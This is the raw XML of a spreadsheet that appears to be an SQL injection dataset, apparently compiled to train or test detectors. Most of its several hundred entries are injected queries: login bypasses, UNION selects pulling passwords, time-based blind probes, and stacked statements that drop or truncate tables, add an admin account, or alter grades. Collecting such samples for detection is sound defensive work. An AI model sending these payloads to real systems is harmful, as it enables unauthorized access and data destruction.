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nokporn\Documents\SQL Injection\Dataset\1\New folder\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="15345" windowHeight="4635"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="ActiveRow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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="521" uniqueCount="521">
  <si>
    <t>SQL Query</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' a' or 1=1--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' '' ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' \\'; DESC users; -- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 'x'='x' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students(StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''; TRUNCATE TABLE Username; --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or 0=0 --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 0=0 --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' and password=''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * from user where id =''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' union select password from users --' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' 1' AND non_existant_table = '1 ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from table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</si>
  <si>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* FROM 'news' WHERE 'id' = ' a' or 'a' = 'a' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' 1 OR 1=1-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='"' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='ddd' group by (studentid)--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' \\'; DESC users; -- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or a=a-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='ddd' union select username,password from students --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT 1,2, IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' \\'; DESC users; -- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''ddd"' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 1=1--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = 'ddd' group by (studentid)--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or a=a--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' 1\\'1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' 1\\'1-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' and password=''</t>
  </si>
  <si>
    <t>SELECT 1,2, ddd' union select username from students -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' union select password from users -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT 1,2, ' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name=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</si>
  <si>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customers WHERE username = ''; DROP table Username --' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * from username where type = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or 'a'='a' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or 1 EXEC XP_ ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' 1 AND 1=1-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' a' or 'a' = 'a' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='"'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='ddd' union select username,password from students --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),โ€SLEEP(1)))OR"*/' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' OR 1=1-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or 'a'='a' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' a' waitfor delay '0:0:10'--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' union select username from students --' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = 'ddd' union select username from students --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' OR username IS NOT NULL OR username = ' ' and password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),โ€SLEEP(1)))OR"*/' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''union select 1,2,3,x,x,x,x,@@version,x--' and password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' 'sqlvuln' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' OR 1=1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' admin'-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or 'x'='x' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or a=a--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from user where id =' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * from username where type = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput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</si>
  <si>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students WHERE username = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''union select 1,2,3,x,x,x,x,@@version,x--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or 1=1--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * from username where type = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from user where id ='ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' '' ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = '' union select password from users --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or a=a--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT email from users where email = '''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''; TRUNCATE TABLE Username; --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from user where id =''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = '' union select password from users where name = 'Robin' --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID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</si>
  <si>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profiles WHERE ID = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = '"'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=''; TRUNCATE TABLE Username; --' and password=''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' OR username IS NOT NULL OR username = ' FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''union select 1,2,3,x,x,x,x,@@version,x--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT id FROM Users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</si>
  <si>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users WHERE name=' ' or 1=1--' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = '' union select password from users --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = '' union select password from users where name = 'Robin' --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = '' union select password from users where name = 'Robin' --' and password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * from user where id =''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='' union select password from users --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT 1,2, a' or 'a' = 'a FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT email from users where email = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),โ€SLEEP(1)))OR"*/' and password=''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 1=1--' and password='';</t>
  </si>
  <si>
    <t>SELECT 1,2, ' 1 AND 1=1-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from user where id =' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes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</si>
  <si>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some_table WHERE double_quotes = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = 'ddd' compute sum(username)--' and password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),โ€SLEEP(1)))OR"*/ FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' OR username IS NOT NULL OR username = ' ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='ddd' group by (password)--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--' and password='';</t>
  </si>
  <si>
    <t>SELECT 1,2, 1 AND USER_NAME() = \'dbo\'-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from user where id =' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' or 0=0 --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' group by (password)--' and password='';</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
